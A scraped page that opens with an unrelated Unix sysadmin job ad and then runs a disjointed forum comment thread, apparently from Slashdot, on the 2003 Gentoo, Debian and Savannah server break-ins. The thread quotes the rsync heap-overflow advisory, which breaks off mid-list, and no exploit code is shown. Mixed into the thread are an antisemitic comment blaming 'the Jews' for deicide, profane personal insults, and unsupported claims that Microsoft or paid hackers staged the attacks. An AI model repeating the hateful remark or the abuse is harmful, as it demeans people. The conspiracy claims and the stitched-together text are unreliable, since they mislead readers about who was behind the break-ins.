Required skills: Strong inter-personal and communication skills; high skill of most UNIX commands/utilities. Familiarity with most basic system administration tools and processes; for example, can boot/shutdown a machine, use backup programs and fsck, maintain system files (hosts, resolv. conf, etc). Fundamental understanding of a UNIX-based operating system; for example, understands job control, soft and hard links, distinctions between the kernel and the shell. Job also requires occasional 24x7 on-call availability. Required background: One to three years of system administration experience. Desirable: A degree in computer science or a related field. Familiarity with networked computing environment concepts; for example, can use the route command, add a workstation to a network, netstat, etc. Ability to write scripts in some administrative language (Perl or shell). Experience with Solaris and Sun hardware especially Enterprise series Familiar with RAID technology Windows NT experience Experience in a 24x7 data center environment Special Note: Whoever we hire will have to be able to function in a 24/7 production environment, be willing to be on call, and be able to learn how to fix all of the problems that come up with the site. The qualifications below give a good idea of what problems we find on the site. I cant get any more specific than that since we see many unique problems that we may have never seen before.
Job Location: Mountain View, California
they may know something now.
It is a *network* intrusion detection system.
There's a big difference there.
NIDS generally sniff packets and look for signatures of attacks.
(on the *network*)
A box level IDS keeps an eye on filesystems to see what has been modified, keeping its information in some more-secure place. (read-only media or something)
I browse at +5 Flamebait- moderation for all or moderation for none.
But I'm glad that there has been so many attacks against linux and other oss projects.
Kernel.org, debian.org, gentoo.org Gnu.org All of them had security holes and now those holes are plugged.
I used to run a few servers. Mostly web-servers, but I had a few for mail and other things. Almost every single one was hacked all in the same 2 month period. I had kept up with updates and I figured I was secure. If I wasn't hacked I would have never known that I wasn't secure and I could have been seriously screwed down the line. It was a much needed eye opener.
I'm just this guy, you know?
I installed 3.4, did a xf86conf, got X just right, cd /usr/ports/x11/kde ; make && make install, the same with fluxbox, and have a suh-WEET desktop with fluxbox and all the KDE apps I need.
I've heard that it is possible to make Ethernet cables with no transmit lines. Basically, you can write to a box connected that way but that box can't talk back. The best you could do then if there was a vulnerability is crash the syslog process on the dropbox.
Ah!
Treehugger? Treehugger... Treehugger!
You were trolling. Whoever modded you as insightful is full of shit. Just like you are.
I think something is wrong with my Gentoo or something...
fede usr # netstat -n -t
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
65.54.230.240:443 TIME_WAIT
tcp 0 0 148.240.150.139:32834 65.54.230.240:443 ESTABLISHED
tcp 1 0 148.240.152.95:34976
fede usr # host 65.54.230.240
Host 240.230.54.65.in-addr.arpa not found: 3(NXDOMAIN)
fede usr # ping 65.54.230.240
PING 65.54.230.240 (65.54.230.240) 56(84) bytes of data.
--- 65.54.230.240 ping statistics ---
2 packets transmitted, 0 received, 100% packet loss, time 1014ms
fede usr # whois 65.54.230.240
OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US
NetRange: 65.52.0.0 - 65.55.255.255
CIDR: 65.52.0.0/14
NetName: MICROSOFT-1BLK
NetHandle: NET-65-52-0-0-1
Parent: NET-65-0-0-0-0
NetType: Direct Assignment
NameServer: DNS1.CP.MSFT.NET
NameServer: DNS2.CP.MSFT.NET
NameServer: DNS1.TK.MSFT.NET
NameServer: DNS1.DC.MSFT.NET
NameServer: DNS1.SJ.MSFT.NET
Comment:
RegDate: 2001-02-14
Updated: 2002-12-05
TechHandle: ZM23-ARIN
TechName: Microsoft Corporation
TechPhone: +1-425-882-8080
TechEmail: noc@microsoft.com
OrgAbuseHandle: ABUSE231-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-425-882-8080
OrgAbuseEmail: abuse@microsoft.com
OrgNOCHandle: ZM23-ARIN
OrgNOCName: Microsoft Corporation
OrgNOCPhone: +1-425-882-8080
OrgNOCEmail: noc@microsoft.com
OrgTechHandle: MSFTP-ARIN
OrgTechName: MSFT-POC
OrgTechPhone: +1-425-882-8080
OrgTechEmail: iprrms@microsoft.com
I am not using any SSL server right now...
unfinished: (adj.)
Wow. 20 people, huh. That would explain why every file on my box was replaced by a picture of the goatse.cx guy.
*BSD is dying.
Oh, wait... never mind.
not really...
Windows is attacked FAR more than OSS. Why?
Recent Windows attacks (...notably and demonstrably Blaster...) have been because of the business model of (the criminal organisation) Micro$oft. There is a not insignificant reservoir of bad feeling about both their illegal use of monopolies, and the cost to business of finding solutions and workarounds to their bugs.
On the other hand the recent attacks on Debian and Gentoo, follow a very different pattern.
The break-ins were very sophisticated (in the sense that the venerability exploited was largely unknown), but then having broken in the behaviour was code-bunny - install sucKIT
Why would a hacker who had presumably discovered the exploit one day when perusing the kernel, follow up with such an unintriguing response?
and then, not completely bored yet, keep doing the same thing?
This is a professional bounty job to backdoor open source development servers.
You know it
I know it
Mr Gates and Mr Bush know it
Don't they sing that song 'Bye Bye Bye'?
You say self-important egomaniac like it's a bad thing. - Peter Dragon
i just tried to up date some sources on a project of mine and i noticed cvs hung for a while. i went to savannah and i saw the "statement". it mentions "minimal services back up by Friday". does anyone know if minimal will include cvs? i'm not trying to hurry them, i'm just curious.
if there are any savannah folks out there reading this, let me say you do a wonderful job keeping everything up and running.
thanks.
-- john
Speak for yourself. It's the Jews who committed the crime of slaying the 'person on the cross'. The same is being done today by the 'Big Guys' -- if something goes against what they believe it, they declare, "You are with us or against us".
BWAHAHAHAHAHAHAHAHAH!!!!!!!!1!!!!!!!
How utterly bloody pathetic. Even your brethren don't like you and mod you down.
Fuck you dickweed.
Did you see anywhere in the message any reference to M$?
No, you stupid fuck.
My post was about COMPUTER SECURITY.
Now, go fuck yourself...
Security is so much more then stopping the user at the door. There are always going to be 0-day exploits, which have no patches. The trick with security is mitigating your exposure. Getting root is not a successful hack, keeping it is. So what if someone rooted my box, if I can see it; I can deal with it. These latest big-profile comprises are actually good news because the attacks where not successful. It shows how well Linux can mitigate exposer, and how it layers it security. This is where Microsoft goes wrong with it's lastest methodology towards security. They think putting a firewall in place is all that you need, which is absolutely wrong.
Nothing more, For me to say; About my life, A life of dreams....
In the interest of continuing cooperation and in helping to improve security for all essential Free Software infrastructure, and despite important philosophical differences, we are working closely with Debian project members to find the perpetrators and to secure essential Free Software infrastructure for the future.
This just had to have RMS invloved, managing to get his bigoted statements in, even when the system has been compromised.
Damn man, you've been rooted and you can think of nothing better to say than that you have "important philosophical differences" with the rest of the OSS world, but that you will be OH SO GENEROUS and actually bother to talk to some people who don't get all hyped up when they say Linux and not GNU/Linux.
That is why your fuckshit GNU/Hurd is still where it is you pompous clown.
We all know in order for 'nix to make it to the desktop, it has to become WAY more user friendly.
You mean like Mac OSX?
I was going to post it here, but the moronic lameness filter won't let me. So you'll need to look at rsync.samba.org.
Comment removed based on user account deletion
switch to freebsd!
...that Microsoft is behind this? This is the second open source Linux distribution that has been attacked. It could also be some students that are paid by Microsoft to show how bad the security is on Linux. I have my doubts.
Yeah, I think Amgine007 said the opposite of what he ment.
Gentoo would be ideal with a web of trust...
Don't you mean a web of distrust, or at least one that didn't rely on trust at all? Ultimately, one can't design a system without some level of trust somewhere, but if you want a web of something make it a web full of nodes that need not depend on the veracity of a centralized source.
I installed W2K under VMware and had it booted for 4 hours. The next day I got e-mail from my ISP informing me that other customers of my ISP had complained that I was broadcasting Blaster. Four Hours!
> Come on. Do you really think Microsoft knows that much about security?
Don't insult me. I worked at Microsoft too and know quite a bit about security. I also know why many Microsoft products don't have much of it, and it has nothing to do with ignorance of programmers.
http://rsync.samba.org/index.html
The rsync team has received evidence that a vulnerability in rsync was recently used in combination with a Linux kernel vulnerability to compromise the security of a public rsync server. While the forensic evidence we have is incomplete, we have pieced together the most likely way that this attack was conducted and we are releasing this advisory as a result of our investigations to date...
If running Gentoo, I wonder if they were using gentoo-sources for the kernel? It includes the grsecurity patches, which in theory make this sort of thing more difficult (although I'm not sure if they stop this particular exploit or not).
I just can't wait until grsecurity is ported to the 2.6 kernels...
seem to be responsible for this breakin. The information has already been posted to Bugtraq by a gentoo team member. Here is the post text:
/etc/rsyncd.conf configuration file. If you are
using the option use chroot = no then remove that line or
change it to use chroot = yes. If you find that you need that
option for your rsync service then you should disable your rsync
service until you have discussed a workaround with the rsync
maintainers on the rsync mailing list. The disabling of the
chroot option should not be needed for any normal rsync server.
Background
The rsync team has received evidence that a vulnerability in rsync was recently used in combination with a Linux kernel vulnerability to compromise the security of a public rsync server. While the forensic evidence we have is incomplete, we have pieced together the most likely way that this attack was conducted and we are releasing this advisory as a result of our investigations to date.
Our conclusions are that:
- rsync version 2.5.6 contains a heap overflow vulnerability that can be used to remotely run arbitrary code.
- While this heap overflow vulnerability could not be used by itself to obtain root access on a rsync server, it could be used in combination with the recently announced brk vulnerability in the Linux kernel to produce a full remote compromise.
- The server that was compromised was using a non-default rsyncd.conf option use chroot = no. The use of this option made the attack on the compromised server considerably easier. A successful attack is almost certainly still possible without this option, but it would be much more difficult.
Please note that this vulnerability only affects the use of rsync as a rsync server. To see if you are running a rsync server you should use the netstat command to see if you are listening on TCP port 873. If you are not listening on TCP port 873 then you are not running a rsync server.
New rsync release
-----------------
In response we have released a new version of rsync, version 2.5.7. This is based on the current stable 2.5.6 release with only the changes necessary to prevent this heap overflow vulnerability. There are no new features in this release.
We recommend that anyone running a rsync server take the following steps:
1) update to rsync version 2.5.7 immediately
2) if you are running a Linux kernel prior to version 2.4.23 then you should upgrade your kernel immediately. Note that some distribution vendors may have patched versions of the 2.4.x series kernel that fix the brk vulnerability in versions before 2.4.23. Check with your vendor security site to ensure that you are not vulnerable to the brk problem.
3) review your
The patches and full source for rsync version 2.5.7 are available from http://rsync.samba.org/ and mirror sites. We expect that vendors will produce updated packages for their distributions shortly.
Credits
-------
The rsync team would like to thank the following individuals for their assistance in investigating this vulnerability and producing this response:
Timo Sirainen <tss iki.fi>
Mike Warfield <mhw wittsend.com>
Paul Russell <rusty samba.org>
Andrea Barisani <lcars gentoo.org>
Regards,
The rsync team
A quick perusal of your posting history shows nothing but attacks on linux and praise for micro-sloth. Douchebag says what?
Next.
Actually, the ebuilds are shell scripts.
md5sum is no protection if they are never checked.
Don't confuse ebuild with spec files from RPM, though RPMs can contain hostile scripts as well.
Anything is possible given time and money.